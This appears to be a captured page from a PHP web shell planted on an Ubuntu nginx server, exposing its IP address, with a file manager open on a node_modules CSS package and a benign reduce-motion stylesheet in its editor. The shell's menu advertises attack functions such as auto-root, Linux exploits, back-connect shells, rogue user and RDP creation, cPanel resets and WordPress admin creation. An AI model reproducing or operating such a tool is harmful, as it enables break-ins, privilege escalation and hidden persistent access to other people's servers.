Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
sanitize.css /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE.md
6.64
KB
-rw-rw-rw-
README.md
9.5
KB
-rw-rw-rw-
assets.css
168
B
-rw-rw-rw-
forms.css
1010
B
-rw-rw-rw-
package.json
1.31
KB
-rw-rw-rw-
reduce-motion.css
708
B
-rw-rw-rw-
sanitize.css
7.21
KB
-rw-rw-rw-
system-ui.css
868
B
-rw-rw-rw-
typography.css
1.13
KB
-rw-rw-rw-
ui-monospace.css
992
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : reduce-motion.css
/* * 1. Remove animations when motion is reduced (opinionated). * 2. Remove fixed background attachments when motion is reduced (opinionated). * 3. Remove timed scrolling behaviors when motion is reduced (opinionated). * 4. Remove transitions when motion is reduced (opinionated). */ @media (prefers-reduced-motion: reduce) { *, ::before, ::after { animation-delay: -1ms !important; /* 1 */ animation-duration: 1ms !important; /* 1 */ animation-iteration-count: 1 !important; /* 1 */ background-attachment: initial !important; /* 2 */ scroll-behavior: auto !important; /* 3 */ transition-delay: 0s !important; /* 4 */ transition-duration: 0s !important; /* 4 */ } }
Close